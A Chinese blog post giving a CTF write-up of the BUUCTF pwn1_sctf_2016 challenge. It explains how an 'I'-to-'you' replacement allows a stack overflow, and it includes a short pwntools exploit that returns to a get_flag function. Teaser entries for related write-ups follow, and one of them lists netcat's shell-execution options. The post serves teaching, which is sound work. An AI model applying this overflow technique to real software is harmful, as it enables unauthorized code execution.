BUUCTF pwn1_sctf_2016

最新推荐文章于 2024-03-27 16:20:09 发布
最新推荐文章于 2024-03-27 16:20:09 发布
阅读量180 收藏 1
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54262894/article/details/120997196
版权

拿到文件先checksec,32位的文件,并且只开启了NX保护

查看main函数

没有什么东西,双击进入vuln()

通过代码可以知道我们输入的I都会被replace函数替换为you

而且s的长度为0x3c,也就是60个字节,可我们最多能够输入32个字符

所以需要输入20个I来填充0x3c这个长度

紧接着又发现了让人开心的东西

 

在函数列表里面有一个get_flag函数,打开它会发现cat flag.txt命令

并且我们记下他的地址0x8048F0D

有了思路就开始写脚本

from pwn import*

p = remote('node4.buuoj.cn',29042)

payload = 'I' * 20 + 'a' * 4 + p32(0x8048F0D)

p.sendline(payload)

p.interactive()

成功拿到flag

不会解pwn的泽
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 929
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 407
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
buuctfpwn1_sctf_2016
最新发布
weixin_54452942的博客
03-27 610
简单易懂~
pwn1_sctf_20161
m0_74091653的博客
09-25 201
函数相对安全,因为它可以限制读取的字符数,防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数 溢出0x3c。指向的字符数组中,直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符,并将其存储在。这里我们正常溢出是不行的。
pwn1_sctf_2016
weixin_56301399的博客
07-21 1662
这道题目的情况是多了个替换字符的函数,使得一个I在存储中变为you,一个字节变为三字节,这时候需要根据情况确定多少字符使得栈溢出。 还是照常的流程,但题目已经开始变化了,我现在还是一知半解迷迷糊糊的状态,害,菜狗子还需努力。......
PWN (3) pwn1_sctf_2016 1
brightendavid的博客
05-11 449
查找字符串,发现了一个flag.txt。 输入在这里 限制为32长度的输入
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[每日一PWN]BUUCTF pwn1_sctf_2016
qq_55233040的博客
11-22 247
本题是利用字符替换达成溢出。
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1432
buuctfpwnpwn1_sctf_2016(细致分析)
buuctf-pwn1 sctf 2016
weixin_45427676的博客
09-20 706
拿到文件后checksec一下,发现开启了NX保护,说明堆栈不可执行,那我们就不能向堆栈上写东西。 查看一下程序 main()函数调用了vuln()函数,查看一下此函数有没有什么漏洞可以利用,enmenm,发现代码很多不知道什么意思(太菜了太菜了),好好看看这些代码到底啥意思吧~~,部分代码注释如下: 本来看到代码5处,想着能通过向缓冲区S中写入数据,利用栈溢出来覆盖返回地址为后门函数地址,但是fgets()函数告诉我此法不行,因为你最多只能向S中输入32个字符,而缓冲区S的大小为0x3c,也就是需要输入
[BUUCTF]——pwn1_sctf_2016
m0_68381884的博客
03-28 488
拿到文件先检查一下 得出结论这是32位程序且开启了nx保护。 用32位ida打开文件,并使用ida分析,看到较为敏感的“get flag” 双击跟进,找到函数后按F5将其反编译得到我们熟悉的伪代码 看到这个函数的作用就是输出“flag.txt”里的内容,记一下地址flag_addr=08048F0D 进入main函数 双击 vuln 函数, 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1412
⭐ 【buuctfpwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【题目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 699
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值